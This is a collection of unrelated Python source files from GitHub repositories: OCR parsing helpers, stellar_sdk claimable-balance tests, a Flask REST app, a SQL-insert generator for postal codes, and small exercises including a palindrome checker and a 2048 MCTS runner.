OCR the crap out of an image to extract all text in it.\n :param psm:\n :param erode_kernel:\n :param erode_iteration:\n :param erode:\n :param image: image to parse text from\n :param scale: size the image needs to be magnified to\n :return:\n \"\"\"\n if DEBUG:\n print(\"Parsing Image\")\n print(\"Called from Method: {}\".format(inspect.stack()[1][3]))\n img = cv2.resize(image, (0, 0), fx=scale, fy=scale)\n if erode:\n img = apply_erode_filter(img, erode_iteration, erode_kernel)\n if DEBUG_IMAGES:\n show_image(img)\n data = pytesseract.image_to_string(Image.fromarray(img), config='--psm {}'.format(psm))\n\n if DEBUG:\n print(\"Identified String: \\n{}\\n ------------ \".format(data))\n return data\n\n\ndef parse_text_from_image_simple(image, psm=6):\n \"\"\"\n Simpler OCR of an image\n :param psm:\n :param image: image to parse text from\n :return:\n \"\"\"\n grayscale_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n big_img = cv2.resize(grayscale_img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)\n tess_result = pytesseract.image_to_string(Image.fromarray(big_img), config='--psm {}'.format(psm))\n\n if DEBUG:\n print(\"Identified String: \\n{}\\n ------------ 
\".format(tess_result))\n return tess_result\n\n\ndef apply_erode_filter(t, iterations, kernel):\n \"\"\"\n Apply erode filter to the image.\n :param t:\n :param iterations: Number of erode iterations\n :param kernel: size of erode kernel\n :return:\n \"\"\"\n b_w_img = cv2.cvtColor(t, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(b_w_img, 127, 255, cv2.THRESH_BINARY)\n kernel = np.ones((kernel, kernel), np.uint8)\n img = cv2.erode(thresh, kernel, iterations=iterations)\n return img\n\n\ndef create_image_array(x_coordinates, y_coordinates, image):\n \"\"\"\n divide an image in array of images [[img, img, img, img],\n [img, img, img, img],\n [img, img, img, img]]\n arrays are oriented along the y axis.\n i.e. images is divided in array from top to bottom,\n then to the next x coordinate and again divided from top to bottom\n\n :param x_coordinates:\n :param y_coordinates:\n :param image:\n :return:\n \"\"\"\n array_of_array_of_images = []\n for x in range(len(x_coordinates) - 1):\n array_of_images = []\n for y in range(len(y_coordinates) - 1):\n img = image[y_coordinates[y]:y_coordinates[y + 1], x_coordinates[x]:x_coordinates[x + 1]]\n array_of_images.append(img)\n array_of_array_of_images.append(array_of_images)\n return array_of_array_of_images\n\n\ndef show_image(img, title=\"Image\"):\n cv2.imshow(title, img)\n if IMG_SHOT_WAIT:\n cv2.waitKey(200)\n else:\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef create_demographic_dict_structure(header, value):\n \"\"\"\n\n :param header:\n :param value:\n :return:\n \"\"\"\n d = {\"type\": \"demographics\", 'data': {}}\n d['data']['prop'] = header\n d['data']['value'] = value\n return d\n\n\ndef manage_keys(header, dict_of_headers):\n \"\"\"\n Checks if header is convertable in\n :param header:\n :param dict_of_headers:\n :return:\n \"\"\"\n # print(\"Header being searched: {}\".format(header))\n if header.strip() in dict_of_headers.keys():\n return dict_of_headers[header.strip()]\n else:\n return None\n\n\ndef create_dictionary(header, value, ts):\n \"\"\"\n Create a dictionary acceptable by the core.\n\n :param header:\n :param value:\n :param ts:\n :return: If time stamp check passes, Dictionary otherwise None\n \"\"\"\n # print(\"Header: {} Valye: {} ts : {}\".format(header, value, ts))\n\n # This is pretty hacky but will work for now\n # Leave blood pressure and temp values raw for now. 
Convert all others to float\n    # or return if no float (shouldn't ever happen)\n    if header.lower() not in {'temp', 'blood pressure'}:\n        re_result = float_regex.search(value)\n        if not re_result:\n            return\n        value = re_result[0]\n    measurement_dict = {\"type\": \"measurement\", 'data': {}}\n    measurement_dict['data']['mmt'] = header\n    measurement_dict['data']['rt'] = datetime.utcnow()\n    measurement_dict['data']['val'] = value\n    if type({}) == type(ts):\n        try:\n            # print(ts)\n            parsed_time = datetime(year=ts['year'],\n                                   month=ts['month'],\n                                   day=ts['day'],\n                                   hour=ts['hour'],\n                                   minute=ts['minute'])\n\n            measurement_dict['data']['ts'] = parsed_time\n            # print(\"Inside create dict: {}\".format(measurement_dict))\n            return measurement_dict\n        except:\n            return None\n    else:\n        measurement_dict['data']['ts'] = ts\n\n    return measurement_dict\n\n\ndef manage_special_keys(data):\n    \"\"\"\n    Manage temp and blood pressure keys\n    :param data:\n    :return:\n    \"\"\"\n    if data['data']['mmt'].lower() == 'temp' and data['data']['val'] != \"\":\n        # Make sure we just have the float value\n        re_result = float_regex.search(data['data']['val'])\n        data['data']['val'] = round((float(re_result[0]) - 32) * 5 / 9, 2)\n        return data\n    elif data['data']['mmt'].lower() == 'blood pressure':\n        if data['data']['val'] != \"\" and \"/\" in data['data']['val']:\n            split_val = data['data']['val'].split('/')\n            ret = [create_dictionary('SysABP', split_val[0], data['data']['ts']),\n                   create_dictionary('DiasABP', split_val[1], data['data']['ts'])]\n            return ret\n        else:\n            return data\n\n\ndef create_measurement_dict_structure(header, value, ts, dict_of_acceptable_keys):\n    \"\"\"\n    convert parsed strings to dictionary structure acceptable by the controller\n    :param dict_of_acceptable_keys:\n    :param header:\n    :param value:\n    :param ts:\n    :return:\n    \"\"\"\n    if DEBUG:\n        print(\"Incoming values : Header : {} \\nValue: {} \\nTs: :{}\".format(header, value, ts))\n\n    # Check if header is acceptable i.e. it's in the dictionary\n    header_val_for_database = manage_keys(header, dict_of_acceptable_keys)\n    if header_val_for_database is None:\n        if DEBUG:\n            print(\"Key {} not found in provided dict_for_acceptable_keys\".format(header))\n        return None\n\n    # Check all values are provided\n    if header is None or value is None or ts is None:\n        if DEBUG:\n            print(\"None Value provided: \\nHeader: {}\\nValue: {}\\nTS: {}\".format(header, value, ts))\n        return None\n\n    # Make sure there is at least one float in the value (to accommodate Blood Pressure)\n    re_result = float_regex.search(value)\n    if not re_result:\n        return None\n    \n    # Create a dictionary that can be submitted to the controller\n    measurement_dict = create_dictionary(header_val_for_database, value, ts)\n    if measurement_dict is None:\n        if DEBUG:\n            print(f'{header_val_for_database} and {value} resulted in None')\n        return None\n    # Manage keys that need changes to values. i.e. 
Temp and BP\n\n measurement_dict = manage_special_keys(measurement_dict)\n if type(measurement_dict) is type([]):\n return measurement_dict\n else:\n return [measurement_dict]\n","repo_name":"jamycoder34/Data-Science","sub_path":"helpers/helper_methods.py","file_name":"helper_methods.py","file_ext":"py","file_size_in_byte":17133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33699037626","text":"from decimal import Decimal\n\nimport pytest\n\nfrom stellar_sdk import Claimant, ClaimPredicate, CreateClaimableBalance, Operation\nfrom stellar_sdk.xdr.claim_predicate import ClaimPredicate as XdrClaimPredicate\n\nfrom . import *\n\n\nclass TestCreateClaimableBalance:\n @pytest.mark.parametrize(\n \"amount, source, xdr\",\n [\n pytest.param(\n \"100\",\n None,\n \"AAAAAAAAAA4AAAABVVNEAAAAAACbjrr4ljhVHc+epPdDIHEQa4erDi2z1pt1pTgicvdZ2AAAAAA7msoAAAAAAwAAAAAAAAAAiZsoQO1WNsVt3F8Usjl1958bojiNJpTkxW7N3clg5e8AAAABAAAAAgAAAAEAAAACAAAABAAAAABfXhAAAAAAAAAAAAIAAAACAAAABQAAAAAAAMNQAAAAAwAAAAEAAAAEAAAAAGVT8QAAAAAAAAAAAGMovsAmvK7LPSwaKH87rbUPu+L3M6626b2Xw4TS/+/xAAAAAAAAAAAAAAAArmMiJMPI1s9rwWI+o1IYFlszbVKWiA9jYn22L63ZTccAAAAEAAAAAF9zSqI=\",\n id=\"without_source\",\n ),\n pytest.param(\n \"100\",\n kp1.public_key,\n \"AAAAAQAAAABiXz1Zw/ieWRoG2l4IxdbkvfDRUDq5wyKBSUnrCR5doQAAAA4AAAABVVNEAAAAAACbjrr4ljhVHc+epPdDIHEQa4erDi2z1pt1pTgicvdZ2AAAAAA7msoAAAAAAwAAAAAAAAAAiZsoQO1WNsVt3F8Usjl1958bojiNJpTkxW7N3clg5e8AAAABAAAAAgAAAAEAAAACAAAABAAAAABfXhAAAAAAAAAAAAIAAAACAAAABQAAAAAAAMNQAAAAAwAAAAEAAAAEAAAAAGVT8QAAAAAAAAAAAGMovsAmvK7LPSwaKH87rbUPu+L3M6626b2Xw4TS/+/xAAAAAAAAAAAAAAAArmMiJMPI1s9rwWI+o1IYFlszbVKWiA9jYn22L63ZTccAAAAEAAAAAF9zSqI=\",\n id=\"with_source_public_key\",\n ),\n pytest.param(\n \"100\",\n muxed1,\n \"AAAAAQAAAQAAAAAAAAAAAWJfPVnD+J5ZGgbaXgjF1uS98NFQOrnDIoFJSesJHl2hAAAADgAAAAFVU0QAAAAAAJuOuviWOFUdz56k90MgcRBrh6sOLbPWm3WlOCJy91nYAAAAADuaygAAAAADAAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAF9eEAAAAAAAAAAAAgAAAAIAAAAFAAAAAAAAw1AAAAADAAAAAQAAAAQAAAAAZVPxAAAAAAAAAAAAYyi+wCa8rss9LBoofzuttQ+74vczrrbpvZfDhNL/7/EAAAAAAAAAAAAAAACuYyIkw8jWz2vBYj6jUhgWWzNtUpaID2NifbYvrdlNxwAAAAQAAAAAX3NKog==\",\n id=\"with_source_muxed_account\",\n ),\n pytest.param(\n \"100\",\n muxed1.account_muxed,\n \"AAAAAQAAAQAAAAAAAAAAAWJfPVnD+J5ZGgbaXgjF1uS98NFQOrnDIoFJSesJHl2hAAAADgAAAAFVU0QAAAAAAJuOuviWOFUdz56k90MgcRBrh6sOLbPWm3WlOCJy91nYAAAAADuaygAAAAADAAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAF9eEAAAAAAAAAAAAgAAAAIAAAAFAAAAAAAAw1AAAAADAAAAAQAAAAQAAAAAZVPxAAAAAAAAAAAAYyi+wCa8rss9LBoofzuttQ+74vczrrbpvZfDhNL/7/EAAAAAAAAAAAAAAACuYyIkw8jWz2vBYj6jUhgWWzNtUpaID2NifbYvrdlNxwAAAAQAAAAAX3NKog==\",\n id=\"with_source_muxed_account_strkey\",\n ),\n pytest.param(\n Decimal(\"100\"),\n kp1.public_key,\n \"AAAAAQAAAABiXz1Zw/ieWRoG2l4IxdbkvfDRUDq5wyKBSUnrCR5doQAAAA4AAAABVVNEAAAAAACbjrr4ljhVHc+epPdDIHEQa4erDi2z1pt1pTgicvdZ2AAAAAA7msoAAAAAAwAAAAAAAAAAiZsoQO1WNsVt3F8Usjl1958bojiNJpTkxW7N3clg5e8AAAABAAAAAgAAAAEAAAACAAAABAAAAABfXhAAAAAAAAAAAAIAAAACAAAABQAAAAAAAMNQAAAAAwAAAAEAAAAEAAAAAGVT8QAAAAAAAAAAAGMovsAmvK7LPSwaKH87rbUPu+L3M6626b2Xw4TS/+/xAAAAAAAAAAAAAAAArmMiJMPI1s9rwWI+o1IYFlszbVKWiA9jYn22L63ZTccAAAAEAAAAAF9zSqI=\",\n id=\"starting_balance_decimal\",\n ),\n ],\n )\n def test_xdr(self, amount, source, xdr):\n predicate_left = ClaimPredicate.predicate_and(\n ClaimPredicate.predicate_before_absolute_time(1600000000),\n ClaimPredicate.predicate_unconditional(),\n )\n predicate_right = ClaimPredicate.predicate_or(\n 
ClaimPredicate.predicate_before_relative_time(50000),\n ClaimPredicate.predicate_not(\n ClaimPredicate.predicate_before_absolute_time(1700000000)\n ),\n )\n predicate1 = ClaimPredicate.predicate_and(predicate_left, predicate_right)\n claimant1 = Claimant(\n destination=\"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMDS674JZ\",\n predicate=predicate1,\n )\n\n predicate2 = ClaimPredicate.predicate_unconditional()\n claimant2 = Claimant(\n destination=\"GBRSRPWAE26K5SZ5FQNCQ7Z3VW2Q7O7C64Z25NXJXWL4HBGS77X7CWTG\",\n predicate=predicate2,\n )\n\n predicate3 = ClaimPredicate.predicate_before_absolute_time(1601391266)\n claimant3 = Claimant(\n destination=\"GCXGGIREYPENNT3LYFRD5I2SDALFWM3NKKLIQD3DMJ63ML5N3FG4OQQG\",\n predicate=predicate3,\n )\n claimants = [claimant1, claimant2, claimant3]\n op = CreateClaimableBalance(\n asset=asset1,\n amount=amount,\n claimants=claimants,\n source=source,\n )\n\n assert op.asset == asset1\n assert op.amount == str(amount)\n assert op.claimants == claimants\n check_source(op.source, source)\n xdr_object = op.to_xdr_object()\n assert xdr_object.to_xdr() == xdr\n assert Operation.from_xdr_object(xdr_object) == op\n\n def test_invalid_amount_raise(self):\n amount = \"12345678902.23423324\"\n claimants = [\n Claimant(\n destination=kp2.public_key,\n predicate=ClaimPredicate.predicate_unconditional(),\n )\n ]\n with pytest.raises(\n ValueError,\n match=f'Value of argument \"amount\" must have at most 7 digits after the decimal: {amount}',\n ):\n CreateClaimableBalance(asset1, amount, claimants, kp1.public_key)\n\n\nclass TestClaimPredicate:\n @staticmethod\n def to_xdr(predicate):\n return predicate.to_xdr_object().to_xdr()\n\n def test_predicate_unconditional(self):\n xdr = \"AAAAAA==\"\n predicate = ClaimPredicate.predicate_unconditional()\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_before_relative_time(self):\n xdr = \"AAAABQAAAAAAAAPo\"\n predicate = ClaimPredicate.predicate_before_relative_time(1000)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_before_absolute_time(self):\n xdr = \"AAAABAAAAABfc0qi\"\n predicate = ClaimPredicate.predicate_before_absolute_time(1601391266)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_not(self):\n xdr = \"AAAAAwAAAAEAAAAEAAAAAF9zSqI=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate = ClaimPredicate.predicate_not(predicate_abs)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_and_1(self):\n xdr = \"AAAAAQAAAAIAAAAEAAAAAF9zSqIAAAAFAAAAAAAAA+g=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_and(predicate_abs, predicate_rel)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_and_2(self):\n xdr = \"AAAAAQAAAAIAAAAFAAAAAAAAA+gAAAAEAAAAAF9zSqI=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n 
predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_and(predicate_rel, predicate_abs)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_or_1(self):\n xdr = \"AAAAAgAAAAIAAAAEAAAAAF9zSqIAAAAFAAAAAAAAA+g=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_or(predicate_abs, predicate_rel)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_or_2(self):\n xdr = \"AAAAAgAAAAIAAAAFAAAAAAAAA+gAAAAEAAAAAF9zSqI=\"\n predicate_abs = ClaimPredicate.predicate_before_absolute_time(1601391266)\n predicate_rel = ClaimPredicate.predicate_before_relative_time(1000)\n predicate = ClaimPredicate.predicate_or(predicate_rel, predicate_abs)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n def test_predicate_mix(self):\n xdr = \"AAAAAQAAAAIAAAABAAAAAgAAAAQAAAAAX14QAAAAAAAAAAACAAAAAgAAAAUAAAAAAADDUAAAAAMAAAABAAAABAAAAABlU/EA\"\n predicate_left = ClaimPredicate.predicate_and(\n ClaimPredicate.predicate_before_absolute_time(1600000000),\n ClaimPredicate.predicate_unconditional(),\n )\n predicate_right = ClaimPredicate.predicate_or(\n ClaimPredicate.predicate_before_relative_time(50000),\n ClaimPredicate.predicate_not(\n ClaimPredicate.predicate_before_absolute_time(1700000000)\n ),\n )\n predicate = ClaimPredicate.predicate_and(predicate_left, predicate_right)\n assert xdr == self.to_xdr(predicate)\n xdr_object = XdrClaimPredicate.from_xdr(xdr)\n assert predicate == ClaimPredicate.from_xdr_object(xdr_object)\n\n\nclass TestClaimant:\n @staticmethod\n def to_xdr(claimant):\n return claimant.to_xdr_object().to_xdr()\n\n def test_claimant(self):\n xdr = \"AAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAF9eEAAAAAAAAAAAAgAAAAIAAAAFAAAAAAAAw1AAAAADAAAAAQAAAAQAAAAAZVPxAA==\"\n destination = \"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMDS674JZ\"\n predicate_left = ClaimPredicate.predicate_and(\n ClaimPredicate.predicate_before_absolute_time(1600000000),\n ClaimPredicate.predicate_unconditional(),\n )\n predicate_right = ClaimPredicate.predicate_or(\n ClaimPredicate.predicate_before_relative_time(50000),\n ClaimPredicate.predicate_not(\n ClaimPredicate.predicate_before_absolute_time(1700000000)\n ),\n )\n predicate = ClaimPredicate.predicate_and(predicate_left, predicate_right)\n claimant = Claimant(destination=destination, predicate=predicate)\n assert self.to_xdr(claimant) == xdr\n assert claimant == Claimant.from_xdr_object(claimant.to_xdr_object())\n\n def test_claimant_default(self):\n xdr = \"AAAAAAAAAACJmyhA7VY2xW3cXxSyOXX3nxuiOI0mlOTFbs3dyWDl7wAAAAA=\"\n destination = \"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMDS674JZ\"\n claimant = Claimant(destination=destination)\n assert self.to_xdr(claimant) == xdr\n assert claimant == Claimant.from_xdr_object(claimant.to_xdr_object())\n\n def test_invalid_destination_raise(self):\n key = \"GCEZWKCA5VLDNRLN3RPRJMRZOX3Z6G5CHCGSNFHEYVXM3XOJMINVALID\"\n with pytest.raises(\n ValueError,\n match=f'Value of argument \"destination\" is not a valid ed25519 public key: {key}',\n ):\n 
Claimant(destination=key)\n","repo_name":"StellarCN/py-stellar-base","sub_path":"tests/operation/test_create_claimable_balance.py","file_name":"test_create_claimable_balance.py","file_ext":"py","file_size_in_byte":11560,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"31"}
{"seq_id":"1673896209","text":"#########################################################################################################\n# Script name : Save_Blob_Azure_Script.py                                                               #\n# Author : Mathieu Fabri                                                                                #\n# Created : 2020-04                                                                                     #\n# Version : 1.0                                                                                         #\n# Language : Python                                                                                     #\n# Description : Script to back up files to Azure Blob storage                                           #\n# License : GPL3 - https://github.com/Altins752/Save_Blob_Azure_Script/blob/main/LICENSE                #\n# GitHub : https://github.com/Altins752/Save_Blob_Azure_Script                                          #\n#########################################################################################################\n\n#!/usr/bin/python3\nimport os, time\nfrom datetime import datetime, timedelta, date\n\n# build a file name stamped with today's date\ndef fileCreate(prefixe, exten):\n    comment_date = date.today() - timedelta(days=0)\n    filename = f\"{prefixe}-{comment_date}.{exten}\"\n    return filename\n\n# build a file name dated back by the configured retention in days (useful for deleting old files)\ndef fileDelete(prefixe, exten, jrs):\n    comment_date = date.today() - timedelta(days=jrs)\n    filename = f\"{prefixe}-{comment_date}.{exten}\"\n    return filename\n\n\n\n","repo_name":"Altins752/Save_Blob_Azure_Script","sub_path":"fileName.py","file_name":"fileName.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"4295798862","text":"frase=str(input('Type a sentence:')).strip().upper()\npalavras=frase.split()\njunto=''.join(palavras)\ninverso= junto[::-1]\n#inverso='' (using a for loop instead of slicing)\n#for letra in range(len(junto) -1,-1,-1):\n    #inverso += junto[letra]\nprint(f'The reverse of \\033[33m{junto}\\033[m is \\033[32m{inverso}\\033[m')\nif inverso==junto:\n    print('We have a \\033[34mPALINDROME!\\033[m')\nelse:\n    print('The sentence you typed \\033[31mIS NOT A PALINDROME!\\033[m')\n","repo_name":"carlos09v/Mini-Projects_Exercises","sub_path":"Python/CursoEmVideo/Mundo 2/Exercícios/ex053--.py","file_name":"ex053--.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
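The slice reversal above compares the raw uppercased text; the sketch below (standalone, not from the repo) also strips punctuation and accents before comparing, so mixed phrases pass too:

import unicodedata

def is_palindrome(sentence: str) -> bool:
    # NFD splits accents into combining marks; isalnum() then drops them along with punctuation
    folded = unicodedata.normalize('NFD', sentence)
    cleaned = ''.join(c for c in folded if c.isalnum()).upper()
    return cleaned == cleaned[::-1]

print(is_palindrome('A man, a plan, a canal: Panama'))  # True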
{"seq_id":"7629548232","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask\n\nfrom recursos.Coches import coches_api, Coche\nfrom recursos.Averias import averias_api, Averia\nfrom recursos.Clientes import clientes_api, Cliente\nfrom recursos.Mecanicos import mecanicos_api, Mecanico\n\nfrom flask.json import JSONEncoder\n\nclass MyJSONEncoder(JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, Averia):\n            return {\n                'idAveria': obj.idAveria,\n                'descripcion': obj.descripcion,\n                'coche': obj.coche\n            }\n        if isinstance(obj, Coche):\n            return {\n                'idCoche': obj.idCoche,\n                'matricula': obj.matricula,\n                'marca': obj.marca,\n                'fechaFabricacion': obj.fechaFabricacion,\n                'tipoAveria': obj.tipoAveria\n            }\n        if isinstance(obj, Cliente):\n            return {\n                'idCliente': obj.idCliente,\n                'nombre': obj.nombre,\n                'domicilio': obj.domicilio,\n                'fechaNacimiento': obj.fechaNacimiento\n            }\n        if isinstance(obj, Mecanico):\n            return {\n                'idMecanico': obj.idMecanico,\n                'nombre': obj.nombre,\n            }\n        return super(MyJSONEncoder, self).default(obj)\n\napp = Flask(__name__)\napp.json_encoder = MyJSONEncoder\n\n# Blueprints for each resource\napp.register_blueprint(averias_api)\napp.register_blueprint(coches_api)\napp.register_blueprint(clientes_api)\napp.register_blueprint(mecanicos_api)\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"sagzain/API-REST","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"20569026404","text":"from uuid import uuid4\nfrom sys import argv\nfrom os import makedirs\nfrom os.path import exists\nfrom datetime import datetime\nfrom pandas import read_csv, DataFrame\nfrom alive_progress import alive_bar\nfrom tqdm import tqdm\n\njoinList = list()\ncreatedAtList = list()\nstateName = argv[1]\ncsvFile = './resources/join/{}_join.csv'.format(stateName)\n\n\njoinData = DataFrame(read_csv(csvFile))\ndatetimeAt: datetime = datetime.now()\nuuid = uuid4()\n\ncreatedAtList.append(\n    \"\"\"\n    insert into datetime_at(id, created_at, updated_at)\n    value(UUID_TO_BIN('{}'), '{}', '{}');\n    \"\"\".format(\n        uuid,\n        datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n        datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n    )\n)\n\nwith alive_bar(len(joinData.index)) as bar:\n    for index, value in joinData.iterrows():\n        if (0 < (datetime.now() - datetimeAt).seconds):\n            uuid = uuid4()\n            datetimeAt = datetime.now()\n            createdAtList.append(\n                \"\"\"\n                insert into datetime_at(id, created_at, updated_at)\n                value(UUID_TO_BIN('{}'), '{}', '{}');\n                \"\"\".format(\n                    uuid,\n                    datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n                    datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n                )\n            )\n\n        joinList.append(\n            \"\"\"\n            insert into catalog_postal_codes(\n                id,\n                state_id,\n                municipality_id,\n                settlement_id,\n                city_id,\n                postal_code_id, zone_id,\n                settlement_type_id, datetime_id\n            )\n            values(\n                UUID_TO_BIN('{}'),\n                UUID_TO_BIN('{}'),\n                UUID_TO_BIN('{}'),\n                UUID_TO_BIN('{}'),\n                UUID_TO_BIN('{}'),UUID_TO_BIN('{}'),UUID_TO_BIN('{}'),UUID_TO_BIN('{}'),UUID_TO_BIN('{}'));\n            \"\"\".format(\n                value.id,\n                value.state_id,\n                value.municipality_id,\n                value.settlement_id,\n                value.city_id,\n                value.postal_code_id,\n                value.zone_id,\n                value.settlement_type_id,\n                uuid\n            )\n        )\n        bar()\n\ndirectory = './resources/sql/{}'.format(stateName)\n\nif not exists(directory):\n    makedirs(directory)\n\nwith open(\n    './resources/sql/{}/createdAt_{}.sql'.format(\n        stateName, stateName\n    ), 'a+'\n) as createdFile:\n    for row in tqdm(createdAtList):\n        createdFile.write(row)\n\nwith open(\n    './resources/sql/{}/postalCodeJoin_{}.sql'.format(\n        stateName, stateName\n    ), 'a+'\n) as joinFile:\n    for row in tqdm(joinList):\n        joinFile.write(row)\n","repo_name":"uetiko/commandsPython","sub_path":"join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
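join.py interpolates UUIDs and timestamps straight into the SQL text. Below is a minimal sketch (illustrative only; shown with sqlite3 while the script clearly targets MySQL) of the same datetime_at insert with driver-side parameter binding, which sidesteps quoting and injection issues:

import sqlite3
from uuid import uuid4
from datetime import datetime

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE datetime_at (id TEXT, created_at TEXT, updated_at TEXT)')
now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# placeholders let the driver handle escaping instead of str.format
conn.execute('INSERT INTO datetime_at (id, created_at, updated_at) VALUES (?, ?, ?)',
             (str(uuid4()), now, now))
conn.commit()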
{"seq_id":"30986656831","text":"class EntradaTiendasBebidas:\n\n    def __init__(self, menor):\n        self.menor = menor\n        self._edad = False\n\n    @property\n    def edad(self):\n        return self._edad\n\n    @edad.setter\n    def edad(self, mayor):\n        # the setter must reuse the property's name so that attribute assignment works\n        if mayor:\n            self._edad = True\n        else:\n            raise ValueError(\"You must be 18 to buy from this store and the buyer is a minor\")\n\n\ncliente = EntradaTiendasBebidas(False)\nprint(cliente.edad)\ncliente.edad = True\nprint(cliente.edad)","repo_name":"XavierCarrera/Catalogo-de-Bebidas","sub_path":"CompradorBebidas.py","file_name":"CompradorBebidas.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"29959773451","text":"import os\nimport copy\nimport random\nimport platform, multiprocessing\nfrom fire import Fire\nfrom Game2048Env import Game2048Env\n\ndef main(seed=0, gamma=0.99, c=100, iter_time=1, d=10, render=True):\n    if platform.system() == 'Darwin':\n        multiprocessing.set_start_method('spawn')\n\n    env = Game2048Env(render)\n    # you can fix the seed for debugging, but your agent SHOULD NOT overfit to the env of a certain seed\n    env.seed(seed)\n    # render is automatically set to False for copied envs\n    # remember to call reset() before calling step()\n    obs = env.reset()\n    obs, rew, done, info = env.step(0)\n    done = False\n\n    from agent import MCTSAgent\n\n    while not done:\n        # copy the observation for the simulations\n        agent = MCTSAgent(env, gamma=gamma, c=c, iter_time=iter_time)\n        obs = copy.deepcopy(obs)\n\n        # select an action\n        action = agent.select_action(obs, d)\n        obs_new, rew, done, info = env.step(action)\n\n        # if the board did not change, fall back to a random action\n        if obs_new == obs:\n            action = random.randint(0, 3)\n            obs_new, rew, done, info = env.step(action)\n            print('select a random action: {}'.format(action))\n\n        print('state: \\n{}'.format(str(obs).replace('], [', '\\n').replace(', ', '\\t').replace('[', '').replace(']', '')))\n        print('do action: {}'.format(['up', 'down', 'left', 'right'][action]))\n        print('obtain reward: {}'.format(rew))\n        print('done: {}'.format(done))\n        print('info: {}\\n'.format(info))\n\n        # reset the observation\n        obs = obs_new\n    \n    print('#' * 70)\n    print('game done, final score: {}\\n\\n'.format(env.score))\n\n    # remember to close the env, but you can always let resources leak on your own computer :|\n    env.close()\n\nif __name__ == '__main__':\n    Fire(main)","repo_name":"AnnyTerfect/MCTS-2048","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"}
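The MCTSAgent itself lives in an agent.py that is not part of this dump; as a rough sketch of what a select_action with these gamma/c/iter_time parameters typically maximizes, here is the UCB1 score (names and statistics below are hypothetical):

import math

def ucb1(value_sum, visits, parent_visits, c=100.0):
    # unvisited children are explored first
    if visits == 0:
        return float('inf')
    return value_sum / visits + c * math.sqrt(math.log(parent_visits) / visits)

stats = {0: (12.0, 3), 1: (9.0, 2), 2: (0.0, 0), 3: (20.0, 6)}  # action -> (value_sum, visits)
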